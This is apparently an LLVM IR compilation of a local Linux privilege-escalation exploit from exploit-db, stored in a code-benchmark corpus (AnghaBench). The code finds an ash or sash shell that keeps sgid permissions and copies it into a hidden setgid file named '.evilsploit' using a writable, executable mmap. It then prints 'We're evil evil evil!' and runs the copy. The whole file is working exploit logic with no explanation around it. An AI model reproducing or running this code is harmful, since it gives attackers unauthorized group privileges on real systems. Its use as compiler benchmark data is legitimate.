; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_6851.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_6851.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [9 x i8] c"/bin/ash\00", align 1
@.str.1 = private unnamed_addr constant [18 x i8] c"ash shell found!\0A\00", align 1
@.str.2 = private unnamed_addr constant [10 x i8] c"/bin/sash\00", align 1
@.str.3 = private unnamed_addr constant [19 x i8] c"sash shell found!\0A\00", align 1
@.str.4 = private unnamed_addr constant [70 x i8] c"no suitable shell found (one that does not drop sgid permissions) :(\0A\00", align 1
@O_RDONLY = common dso_local global i32 0, align 4
@.str.5 = private unnamed_addr constant [9 x i8] c"size=%d\0A\00", align 1
@.str.6 = private unnamed_addr constant [12 x i8] c".evilsploit\00", align 1
@O_RDWR = common dso_local global i32 0, align 4
@O_CREAT = common dso_local global i32 0, align 4
@O_EXCL = common dso_local global i32 0, align 4
@PROT_WRITE = common dso_local global i32 0, align 4
@PROT_EXEC = common dso_local global i32 0, align 4
@MAP_SHARED = common dso_local global i32 0, align 4
@.str.7 = private unnamed_addr constant [24 x i8] c"We're evil evil evil!\0A\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i8*, align 8
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca i32, align 4
  %11 = alloca i8*, align 8
  %12 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %13 = call i8* @malloc(i32 3170304)
  store i8* %13, i8** %6, align 8
  store i32 0, i32* %12, align 4
  %14 = load i8*, i8** %6, align 8
  %15 = call i64 @stat(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str, i64 0, i64 0), i8* %14)
  %16 = icmp eq i64 %15, 0
  br i1 %16, label %17, label %19

17:                                               ; preds = %2
  %18 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.1, i64 0, i64 0))
  store i32 1, i32* %12, align 4
  br label %19

19:                                               ; preds = %17, %2
  %20 = load i32, i32* %12, align 4
  %21 = icmp eq i32 %20, 0
  br i1 %21, label %22, label %29

22:                                               ; preds = %19
  %23 = load i8*, i8** %6, align 8
  %24 = call i64 @stat(i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.2, i64 0, i64 0), i8* %23)
  %25 = icmp eq i64 %24, 0
  br i1 %25, label %26, label %28

26:                                               ; preds = %22
  %27 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.3, i64 0, i64 0))
  store i32 1, i32* %12, align 4
  br label %28

28:                                               ; preds = %26, %22
  br label %29

29:                                               ; preds = %28, %19
  %30 = load i32, i32* %12, align 4
  %31 = icmp eq i32 %30, 0
  br i1 %31, label %32, label %35

32:                                               ; preds = %29
  %33 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([70 x i8], [70 x i8]* @.str.4, i64 0, i64 0))
  %34 = call i32 @exit(i32 2) #3
  unreachable

35:                                               ; preds = %29
  store i32 0, i32* %8, align 4
  %36 = load i32, i32* %12, align 4
  %37 = icmp eq i32 %36, 1
  br i1 %37, label %38, label %41

38:                                               ; preds = %35
  %39 = load i32, i32* @O_RDONLY, align 4
  %40 = call i32 (i8*, i32, ...) @open(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str, i64 0, i64 0), i32 %39)
  store i32 %40, i32* %9, align 4
  br label %41

41:                                               ; preds = %38, %35
  %42 = load i32, i32* %12, align 4
  %43 = icmp eq i32 %42, 2
  br i1 %43, label %44, label %47

44:                                               ; preds = %41
  %45 = load i32, i32* @O_RDONLY, align 4
  %46 = call i32 (i8*, i32, ...) @open(i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.2, i64 0, i64 0), i32 %45)
  store i32 %46, i32* %9, align 4
  br label %47

47:                                               ; preds = %44, %41
  br label %48

48:                                               ; preds = %56, %47
  %49 = load i32, i32* %9, align 4
  %50 = load i8*, i8** %6, align 8
  %51 = load i32, i32* %8, align 4
  %52 = sext i32 %51 to i64
  %53 = getelementptr inbounds i8, i8* %50, i64 %52
  %54 = call i64 @read(i32 %49, i8* %53, i32 1)
  %55 = icmp ne i64 %54, 0
  br i1 %55, label %56, label %59

56:                                               ; preds = %48
  %57 = load i32, i32* %8, align 4
  %58 = add nsw i32 %57, 1
  store i32 %58, i32* %8, align 4
  br label %48

59:                                               ; preds = %48
  %60 = load i32, i32* %8, align 4
  %61 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.5, i64 0, i64 0), i32 %60)
  %62 = load i32, i32* @O_RDWR, align 4
  %63 = load i32, i32* @O_CREAT, align 4
  %64 = or i32 %62, %63
  %65 = load i32, i32* @O_EXCL, align 4
  %66 = or i32 %64, %65
  %67 = call i32 (i8*, i32, ...) @open(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.6, i64 0, i64 0), i32 %66, i32 1512)
  store i32 %67, i32* %10, align 4
  %68 = load i32, i32* %10, align 4
  %69 = load i32, i32* %8, align 4
  %70 = call i32 @ftruncate(i32 %68, i32 %69)
  %71 = load i32, i32* %8, align 4
  %72 = load i32, i32* @PROT_WRITE, align 4
  %73 = load i32, i32* @PROT_EXEC, align 4
  %74 = or i32 %72, %73
  %75 = load i32, i32* @MAP_SHARED, align 4
  %76 = load i32, i32* %10, align 4
  %77 = call i8* @mmap(i32* null, i32 %71, i32 %74, i32 %75, i32 %76, i32 0)
  store i8* %77, i8** %11, align 8
  %78 = load i8*, i8** %11, align 8
  %79 = load i8*, i8** %6, align 8
  %80 = load i32, i32* %8, align 4
  %81 = call i32 @memcpy(i8* %78, i8* %79, i32 %80)
  %82 = load i8*, i8** %11, align 8
  %83 = load i32, i32* %8, align 4
  %84 = call i32 @munmap(i8* %82, i32 %83)
  %85 = load i32, i32* %10, align 4
  %86 = call i32 @close(i32 %85)
  %87 = load i32, i32* %9, align 4
  %88 = call i32 @close(i32 %87)
  %89 = load i8*, i8** %6, align 8
  %90 = call i32 @free(i8* %89)
  %91 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str.7, i64 0, i64 0))
  %92 = call i32 @execv(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.6, i64 0, i64 0), i32* null)
  %93 = load i32, i32* %3, align 4
  ret i32 %93
}

declare dso_local i8* @malloc(i32) #1

declare dso_local i64 @stat(i8*, i8*) #1

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @open(i8*, i32, ...) #1

declare dso_local i64 @read(i32, i8*, i32) #1

declare dso_local i32 @ftruncate(i32, i32) #1

declare dso_local i8* @mmap(i32*, i32, i32, i32, i32, i32) #1

declare dso_local i32 @memcpy(i8*, i8*, i32) #1

declare dso_local i32 @munmap(i8*, i32) #1

declare dso_local i32 @close(i32) #1

declare dso_local i32 @free(i8*) #1

declare dso_local i32 @execv(i8*, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
